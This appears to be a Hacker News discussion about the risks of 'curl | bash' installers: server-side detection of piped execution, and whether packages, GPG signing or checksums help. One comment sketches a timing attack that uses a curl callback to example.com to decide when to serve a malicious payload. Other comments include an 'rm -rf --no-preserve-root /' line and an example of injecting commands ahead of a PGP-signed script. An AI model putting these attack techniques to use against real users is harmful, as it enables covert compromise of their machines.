bash -c "$(curl -sSLf $URL)"
The key is to download first and then runcurl $URL
less $FILE
bash $FILE
This attack only works at all if you download something and execute it immediately without looking at it.
Surely there's some compromise middle ground? Let me download "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner? Maybe the checksum matches from a crowdsourced database.
"Sorry only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script and we will ask you if it looks valid or not or don't know."
I also think it's a bit more realistic than the, "anyone who does this should be reading the script first to check that it's safe." Yes, and I check the passenger jet for flaws before I board, too!
Just spitballing.
There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.
I certainly have to do some hoop jumping to execute the equivalent of curl |bash on powershell.
I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I review it. Most install scripts and up doing "hit website, install thing" anyways - am I reviewing the second stage install script also?
This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).
But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.
The more important reason why it is a _horrible_ _stupid_ mechanism for software installation is that it is not _repeatable_.
It is well understood that casual .deb .rpm usage requires an equivalent level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_ _repeatable_ and _mirrorable_... I can copy the entire repository of any version of debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.
curl|bash involves no checks, and no system integration whatsoever.
1) Distributing software via bash script is a bad idea
2) Sensible people review the bash scripts they downloaded before running them
3) But haha! Here is a clever trick that evades that review.
And I'm not persuaded by 3) being interesting because I already rejected 1) and 2), and I consider 3) to just be proving my point -- you (for all you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at, and the actual reasoning to apply when deciding to install software this or any way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?".
It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.
How do we come back next week and ensure some other process hasn't changed the files ?
Package your files with a signed system. Auditing the files is trivial after that.
`curl https://somesite.com/foo.sh | bash`
with
`curl https://somesite.com/foo.deb`
and
`curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software`
I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.
But I agree with your sentiment. If the exact same step was to `apt install ecs-cli` I would just do that and not feel any inconvenience about it.
https://joeyh.name/code/moreutils/ https://rentes.github.io/unix/utilities/2015/07/27/moreutils...
If you know you are running the standard scripts that everyone runs, then it also makes a post-breach investigation more easy. You know the exact scripts you ran as opposed to knowing "well I curl | bashed from these sites so one of them might be bad".
An amusing gotcha I found with docker was how do I convince the servers I communicate with from in the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)
Be very careful here. https://installation.s3.amazonaws.com/setup.sh looks like a legit URL, but it's just some guy with an S3 bucket named "installation".
Either you trust the entity you're downloading software from or you don't.
QubeOS adopted the "manual authentication" method (of having to confirm everything, such as clipboard copy/paste).
This is probably not quite scalable (not to mention annoying). May be there's some way to have a short session token, so during a work session of a few hours, it works without any intervention.
Say you already trust the website you're downloading from, is there an increased security risk doing curl | bash as compared to rpm --import https://example.com/RPM-GPG-EXAMPLE && yum install https://example.com/example.rpm
No matter what you're putting 100% faith in the the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.
Not a random website, and they do have an infrastructure.
$ echo 'ls -l /proc/$$/fd/0' | bash
lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd0 to be a pipe.We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.
This is superior to the dodgy, delay-based server side detection because it is reliable.
Also, it still works when someone does this:
$ curl <url> > file
$ cat file | bash
Of course, no protection for $ bash fileWhat do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).
deb is still a more structured format that is less likely to result in accidental collateral damage.
rm -rf —no-preserve-root / 2>&1 > /dev/null
Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp —scripts package.rpm, isn’t this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?
Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.
I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.
I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but other users.
Instead of your (1) and (2) above, how about this?
1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.
2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.
3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.
Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like
curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software
I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.
Can anyone point to a single case of a shell pipe ever being abused ever?
A=$(curl -L https://get.rvm.io);echo "$A" | shasum -a 256 | grep -q 05b6b5f164d4df5aa593f9f925806fc1f48c4517daeeb5da66ee49e8562069e1 && (echo "$A")
For that matter, where did you get the key ID.
I certain that someone has been exploited using shell pipes.
> a knowledgable user will most likely check the content first
The obvious workaround would be to download with curl, inspect, then run the virtually same inspected file through bash. This workflow is easier without necessarily using pipes. Package files can also be inspected before running and are not directly inspected in the browser.
Trust on the other hand is more complicated. Without doing tedious manual inspecting, you have to rely on the distributor. In this case, public keys aid in this regard, but also does not work with the `curl | bash` workflow.
.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)
Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.
There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.
1. Send your response as transfer-encoding: chunked and tcp_nodelay
2. Send the first command as
curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.
# Check network connectivity so we can continue the install
if ! curl --fail www.example.com; then exit; fi
Of course, what actually is happening is that we've just informed the server to now serve our malicious code. bash -c "`echo echo hi`"
note that `echo echo hi` is fully read, and then (and only then) passed to bash.ditto for
echo -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.
dmg: download an archive file which contains a signed payload which is copied to Apps. Admin rights are used for copying only.
The difference is blindingly obvious.
You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.
To you it's obvious that packages aren't more secure, it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.
https://pydio.com/en/docs/v8/ed-debianubuntu-systems
https://docs.docker.com/install/linux/docker-ce/ubuntu/#inst...
https://www.spotify.com/uk/download/linux/
https://www.elastic.co/guide/en/apm/server/current/setup-rep...
https://ring.cx/en/download/gnu-linux
http://docs.grafana.org/installation/debian/
https://support.plex.tv/articles/235974187-enable-repository...
https://stack-of-tasks.github.io/pinocchio/download.html
http://download.mantidproject.org/ubuntu.html
https://docs.microsoft.com/en-us/cli/azure/install-azure-cli... (!!!)
You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.
Another problem is that people are being trained to get software [directly] from software developers.
The "antipattern" is letting/expecting software developers also be software publishers.
I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.
Not foolproof, but it answers your objection.
Verify key signatures.
And I really wish GPG had a negative trust signature.
Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?
The bash detection is clever but I think its a solution to a problem that doesn't exist.. Its already very easy to install hide malicious code in plain sight, why go to all this trouble to detect if the user is piping to bash?
For example, see how easy it is to publish a fake npm package or a .deb package:
https://hackernoon.com/im-harvesting-credit-card-numbers-and...
I wrote a tool that could be used like that but it's useless if its not ubiquitous (https://github.com/mmikulicic/runck)
$ curl <url> | pipe-checksum <expected> | bash
https://gist.github.com/pcl/64bd2f56695fcf8e1fad51443aab1f1eEg the key from https://docs.docker.com/install/linux/docker-ce/ubuntu/#set-... doesn't have signatures, and isn't on the keyservers.
Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists. And you can keep the initially downloaded key in your CI configs.
This is ... not everything that it could be, and is approaching 30 years old, technology built for a vastly different world.
But this is the basis of the GPG / PGP Web of Trust.
https://en.wikipedia.org/wiki/Web_of_trust
http://www.pgpi.org/doc/pgpintro/
http://www.rubin.ch/pgp/weboftrust.en.html
(I've addressed this point ... a distressing number of times on HN: https://hn.algolia.com/?query=dredmorbius%20web%20of%20trust... 0
I.e., curl is a *nix tool.
With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.
The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.
Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.
At any rate - code-signing doesn't really help if the author is the attacker.
Indeed. While this particular venue wouldn't have worked for:
https://wiki.gentoo.org/wiki/Project:Infrastructure/Incident...
(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian to suffer from compromise. But as they just push signed debs, the damage would be limited (not trivial, there could conceivably be bugs in apt/dpkg/gnupg etc).
curl -s \
'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61'
| gpg --import \
&& if z=$(curl -s 'https://install.zerotier.com/' | gpg);
then echo "$z"
| sudo bash;
fi
It's interesting - it tries to import a given gpg key from keyserver, then grabs a gpg armored text file with a bash header - with the gpg header wrapped in a here-document: #!/bin/bash
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
I'm unsure, but I think you could just stick your malicious code before the signature? #!/bin/bash
sudo much_evil
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and need copy-pasting - as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering js depending on visitor).Anyway, the use case for my runck utility is scripts such as dockefiles or CI automation where I want to download and run installers and I don't want to reduce the bash boilerplate.
You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.
It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:
kernel.org: ABAF11C65A2970B130ABE3C479BE3E4300411886 Linus Torvalds <torvalds@kernel.org>
marc.info: 647F28654894E3BD457199BE38DBBDC86092693E Greg Kroah-Hartman <gregkh@kernel.org>
thunk.org: 3AB057B7E78D945C8C5591FBD36F769BC11804F0 Theodore Ts'o <tytso@mit.edu>
All keys are cross signed as shown by gpg2 --list-signatures.If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.
Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.
If there was a standard `curlbash <URL> <SHA256>` program that was installed everywhere it would allow to work around all of these issues.
You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.
If you mean that other thing, no.
It is definitely a kludge though.
curl www.example.com/downloads/fooprogram/builds/D41D8CD98F00B204E9800998ECF8427E.tgz
If the time between the script being downloaded and that file being requested is large, serve the clean copy, else download the malicious binary.Now packages.redhat.com gets hacked - if hacker also stole private key used for signing packages and replaced the RPMs. I will get warning/error while installing rpms (which I admit most users will ignore) but a curl|bash kinda defeats the point of package signing too.
When RPM-GPG-EXAMPLE and example.rpm are both coming from https://example.com it's less clear. When example.com is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the signatures in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection as being built by example.com.
From that example, we can see that package signing also protects from someone who's able to break into the main example.com webserver but not example.com's build system - if the attackers did not get into the build system and example.rpm has a valid signature then despite the webserver being broken, the rpm file can still be trusted, assuming the webserver did not have a copy of the private key used for build signing. If we loaded https://example.com/RPM-GPG-EXAMPLE before the webserver was broken into, and then the webserver was broken into and a malicious RPM-GPG-EXAMPLE and example.rpm were uploaded, it would be noticed. (Examining changes to RPM-GPG-EXAMPLE are, unfortunately, left to the reader as an exercise.)
Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, but there are methods available to confirm that the file's contents are valid, that don't rely on TLS, if the security folk at example.com are doing their job.
Finally, TLS is not an all or nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted, and in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (eg crt.sh) is a proper lever when working with example.com.
Security is complicated and there are no silver bullets.
`curl | sudo bash` is batshit though.
What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.
I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.
So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
> you'll have a saved copy of the key afterward
Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?
They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.
Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.
Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.
Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.
It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.
[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.
The package management community needs to stop balkanizing.
How else do you propose releasing software to all Unix-like OSes without learning a half dozen package manager formats and quirks? Only other choice is a container.
1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.
2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.
3. Smarter users. Good luck with that one.
Remember, I said that the bug in the file broke the network configuration so that Alice and Bob lost all network access.
The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.
What I see happening is the downloaded script does not fully run until fully downloaded.
I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)
> Execution in bash is performed line by line and so the speed that bash can ingest data is limited by the speed of execution of the script.
So even without any clever detection logic, thinking of curl | bash as "downloading a script, then immediately executing it" is already wrong.
It's more "give this remote host a poor man's shell to my machine and hope that they will always execute the same sequence of commands on it".
The simple solution here is not to use curl/execute with a pipe. Just wget to save the file and check it locally (rather than through a browser) before executing.